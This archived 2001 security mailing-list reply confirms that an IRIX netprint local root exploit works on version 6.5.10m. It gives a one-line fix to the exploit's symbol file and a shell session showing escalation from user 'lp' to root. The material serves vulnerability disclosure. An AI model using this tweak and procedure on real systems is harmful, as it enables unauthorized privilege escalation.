Re: IRIX /usr/lib/print/netprint local root symbols exploit.

From: Thomas-Martin Kruel (kruel@mbi-berlin.de)
Date: Sat Apr 28 2001 - 09:37:02 PDT

Next message: Ron Cohen: "Re: Oracle8 denial of service"

Previous message: Jochen Hein: "SAP R/3 Web Application Server Demo for Linux: root exploit"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

I tested against 6.5.10m and it works.

just add

 fprintf(symbol,"void ListAllPrinters(){}\n");

to the list of symbols and execute the xploit as user "lp":

% whoami
lp
% ./xnetprint /bin/sh
[(IRIX)netprint[] local root exploit, by: v9[v9at_private]. ]
[*] making symbols source file for netprint to execute.
[*] done, now compiling symbols source file.
[*] done, now checking to see if the symbols source compiled.
[*] done, now executing netprint.
[*] success, uid: 0, euid: 0, gid: 0, egid: 0.
# whoami
root


The "lp" account, however, is no longer left open by default since 6.5, AFAIK.

Thomas.

---
Max-Born-Institut fuer Nichtlineare Optik und Kurzzeitspektroskopie
Max-Born-Strasse 2A, D-12489 Berlin, Germany
Leiter EDV - Thomas-Martin Kruel
   mailto: kruel@mbi-berlin.de    Tel. 030 / 6392-1540, Fax: -1509, Funk: 0170 / 9247486
Support: http://www.mbi-berlin.de/edv
   mailto: support@mbi-berlin.de  Tel. 030 / 6392-1555, Pager: alarm@mbi-berlin.de

Next message: Ron Cohen: "Re: Oracle8 denial of service"
Previous message: Jochen Hein: "SAP R/3 Web Application Server Demo for Linux: root exploit"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Sun Apr 29 2001 - 23:46:00 PDT